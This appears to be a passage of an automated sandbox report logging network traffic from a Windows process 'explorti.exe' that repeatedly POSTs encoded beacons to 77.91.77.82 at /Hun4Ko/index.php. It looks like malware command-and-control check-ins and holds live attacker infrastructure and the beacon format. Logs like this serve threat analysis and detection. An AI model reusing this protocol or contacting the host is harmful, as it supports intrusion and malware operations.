                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            111192.168.2.46400377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:18.580980062 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:19.297314882 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            112192.168.2.46400477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:19.415723085 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:20.102442026 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            113192.168.2.46400577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:20.112092018 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:20.799535036 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            114192.168.2.46400677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:20.920370102 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:21.618947029 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            115192.168.2.46400777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:21.683418989 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:22.340917110 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            116192.168.2.46400877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:22.462877989 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            117192.168.2.46400977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:22.477634907 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:23.176176071 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            118192.168.2.46401077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:23.290486097 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            119192.168.2.46401177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:23.305067062 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:24.004628897 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            120192.168.2.46401277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:24.120310068 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:24.827539921 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            121192.168.2.46401377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:24.836566925 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:25.540055990 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            122192.168.2.46401477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:25.649159908 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:26.345896006 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            123192.168.2.46401577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:26.354829073 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:27.073640108 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            124192.168.2.46401677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:27.196680069 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:27.891232014 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            125192.168.2.46401777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:27.902295113 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:28.591330051 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            126192.168.2.46401877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:28.712479115 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:29.425815105 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            127192.168.2.46401977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:29.435534000 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:30.134907007 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            128192.168.2.46402077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:30.260164976 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:31.060774088 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            129192.168.2.46402177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:31.070574045 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:31.769907951 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            130192.168.2.46402277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:31.885169029 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:32.590830088 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            131192.168.2.46402377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:32.608503103 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:33.312416077 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            132192.168.2.46402477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:33.432593107 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            133192.168.2.46402577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:33.446451902 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
